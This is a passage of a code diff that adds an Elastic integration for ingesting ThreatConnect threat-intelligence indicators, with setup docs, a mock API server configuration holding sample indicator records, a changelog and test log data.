Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. +This module has been tested against the **ThreatConnect API Version v3**. +The minimum required ThreatConnect Platform version needs to be **7.3.1**. + +## Setup + +### To collect data from ThreatConnect, the following parameters from your ThreatConnect instance are required: + +1. Access Id +2. Secret Key +3. URL + +To create an API user account, please refer to [this](https://knowledge.threatconnect.com/docs/creating-user-accounts) article. + +### Enabling the integration in Elastic: +1. In Kibana, go to Management > Integrations. +2. In the "Search for integrations" search bar, type ThreatConnect. +3. Click on the "ThreatConnect" integration from the search results. +4. Click on the "Add ThreatConnect" button to add the integration. +5. Configure all required integration parameters, including Access Id, Secret Key, and URL, to enable data collection from the ThreatConnect REST API. +6. Save the integration. + +## Indicators Expiration + +The ingested indicators expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active indicators be available to the end users. Since we want to retain only valuable information and avoid duplicated data, the ThreatConnect Elastic integration forces the intel indicators to rotate into a custom index called: `logs-ti_threatconnect_latest.dest_indicator-*`. +**Please, refer to this index in order to set alerts and so on.** + +#### Handling Orphaned Indicators + +Some ThreatConnect indicators may never expire and will continue to stay in the latest destination index. To avoid any false positives from such orphaned indicators, users are allowed to configure `IOC Expiration Duration` parameter while setting up the integration. This parameter deletes all data inside the destination index `logs-ti_threatconnect_latest.dest_indicator` after this specified duration is reached. Users must pull entire feed instead of incremental feed when this expiration happens so that the indicators get reset. + +### How it works + +This is possible thanks to a transform rule installed along with the integration. The transform rule parses the data stream content that is pulled from ThreatConnect and only adds new indicators. + +Both the data stream and the latest index have applied expiration through ILM and a retention policy in the transform respectively. + +## Logs Reference + +### Indicator + +This is the `Indicator` dataset. + +#### Example + +{{event "indicator"}} + +{{fields "indicator"}} diff --git a/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml b/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..7654298669f --- /dev/null +++ b/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,15 @@ +version: '2.3' +services: + threatconnect-indicator: + image: docker.elastic.co/observability/stream:v0.13.0 + hostname: threatconnect-indicator + ports: + - 8090 + volumes: + - ./files:/files:ro + environment: + PORT: '8090' + command: + - http-server + - --addr=:8090 + - --config=/files/config-indicator.yml diff --git a/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml b/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml new file mode 100644 index 00000000000..ef2b12fa46b --- /dev/null +++ b/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml @@ -0,0 +1,678 @@ +rules: + - path: /api/v3/indicators + methods: ["GET"] + query_params: + resultStart: 0 + resultLimit: 2 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "next": "abcd", + "data": [ + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "Test", + "lastName": "User", + "pseudonym": "TestW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 707771, + "dateAdded": "2023-08-23T09:25:51Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/707771/overview", + "type": "Hashtag", + "lastModified": "2023-12-05T06:38:53Z", + "summary": "#testabc", + "privateFlag": false, + "active": true, + "activeLocked": false, + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/customIndicator.xhtml?id=707771&owner=Elastic", + "Hashtag": "#testabc" + } + ] + }, + "attributes": { + "data": [ + { + "id": 71670442, + "dateAdded": "2023-12-05T06:47:59Z", + "type": "Last Seen", + "value": "2023-12-05T06:47:57Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:59Z", + "pinned": false, + "default": false + }, + { + "id": 71670441, + "dateAdded": "2023-12-05T06:47:47Z", + "type": "First Seen", + "value": "2023-12-05T06:47:45Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:47Z", + "pinned": false, + "default": false + } + ] + }, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + }, + { + "id": 736758, + "dateAdded": "2023-08-24T06:19:58Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/736758/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "EmailAddress", + "lastModified": "2023-12-05T06:38:53Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "test.user@elastic.co", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + } + ] + }, + "attributes": {}, + "address": "test.user@elastic.co", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic" + } + ] + } + - path: /api/v3/indicators + methods: ["GET"] + query_params: + resultStart: 2 + resultLimit: 2 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "data": [ + { + "id": 738669, + "dateAdded": "2023-08-24T06:28:17Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "http://www.testingmcafeesites.com/testcat_pc1.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "Test", + "lastName": "User", + "pseudonym": "TestW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601238, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 707771, + "dateAdded": "2023-08-23T09:25:51Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/707771/overview", + "type": "Hashtag", + "lastModified": "2023-12-05T06:38:53Z", + "summary": "#testabc", + "privateFlag": false, + "active": true, + "activeLocked": false, + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/customIndicator.xhtml?id=707771&owner=Elastic", + "Hashtag": "#testabc" + } + ] + }, + "attributes": { + "data": [ + { + "id": 71670442, + "dateAdded": "2023-12-05T06:47:59Z", + "type": "Last Seen", + "value": "2023-12-05T06:47:57Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:59Z", + "pinned": false, + "default": false + }, + { + "id": 71670441, + "dateAdded": "2023-12-05T06:47:47Z", + "type": "First Seen", + "value": "2023-12-05T06:47:45Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:47Z", + "pinned": false, + "default": false + } + ] + }, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + }, + { + "id": 736759, + "dateAdded": "2023-08-24T06:19:58Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/736758/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "EmailAddress", + "lastModified": "2023-12-06T06:38:53Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "test.user@elastic.co", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + } + ] + }, + "attributes": {}, + "address": "test.user@elastic.co", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic" + } + ] + } diff --git a/packages/ti_threatconnect/changelog.yml b/packages/ti_threatconnect/changelog.yml new file mode 100644 index 00000000000..80776133e35 --- /dev/null +++ b/packages/ti_threatconnect/changelog.yml @@ -0,0 +1,22 @@ +# newer versions go on top +- version: "0.3.0" + changes: + - description: Update Readme and Description for configuration parameters. + type: enhancement + link: https://github.com/elastic/integrations/pull/9231 + - description: Update field for Fingerprint processor and mapping of Event ID. + type: enhancement + link: https://github.com/elastic/integrations/pull/9231 + - description: Resolve Signature Mismatch error with special character starting secret_key. + type: enhancement + link: https://github.com/elastic/integrations/pull/9231 +- version: "0.2.0" + changes: + - description: Set sensitive values as secret, upgrade to package spec 3.0.3, and add missing mapping. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 +- version: "0.1.0" + changes: + - description: Initial release. + type: enhancement + link: https://github.com/elastic/integrations/pull/8925 diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log new file mode 100644 index 00000000000..f8e43d472d2 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log @@ -0,0 +1 @@ +{"id": 891599,"dateAdded": "2023-08-25T12:57:24Z","description": "bad email","securityLabels": {"data": [{"id": 3,"name": "TLP:AMBER","source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ","description": "Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.","color": "FFC000","owner": "System","dateAdded": "2016-08-31T00:00:00Z"}]},"ownerId": 51,"ownerName": "Elastic","webLink": "https://partnerstage-intel.threatconnect.com/","tags": {"data": [{"id": 1,"name": "userexecution:maliciouslink","lastUsed": "2023-08-25T13:15:30Z","description": "ApplythisTagtoobjectsrelatedtoransomwareattacks","owner": "Demoorganization","techniqueId": "T1055.005","platforms": {"data": ["Windows"],"count": 1}}]},"type": "EmailAddress","lastModified": "2023-12-01T08:26:48Z","rating": 3,"confidence": 61,"threatAssessRating": 3,"threatAssessConfidence": 61,"threatAssessScore": 382,"threatAssessScoreObserved": 0,"threatAssessScoreFalsePositive": 0,"summary": "johnbae@poverts.com","privateFlag": false,"active": true,"activeLocked": false,"Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","md5": "F5A2496CF66CXXCFFE66CXXB27D7XXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","hostName": "samplehost","size": 123,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/tes_pc.html","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z","Hashtag": "#testabc","Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"Subject": "Spam","source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX","externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","Block": "0.0.0.0","User Agent String": "PostmanRuntime/7.32.3","associatedGroups": {"data": [{"id": 6,"ownerId": 51,"ownerName": "DemoOrganization","dateAdded": "2021-11-03T14:57:45Z","webLink": "https://app.threatconnect.com/#/details/groups/3/overview","type": "Incident","name": "BadIncident","createdBy": {"userName": "johnsmithxyz@gmail.com","firstName": "john","lastName": "smith","pseudonym": "jsmithAPI","owner": "DemoOrganization","id": 3},"upVoteCount": "0","downVoteCount": "0","generatedReport": true,"password": "duwyhfsjhsi","malware": 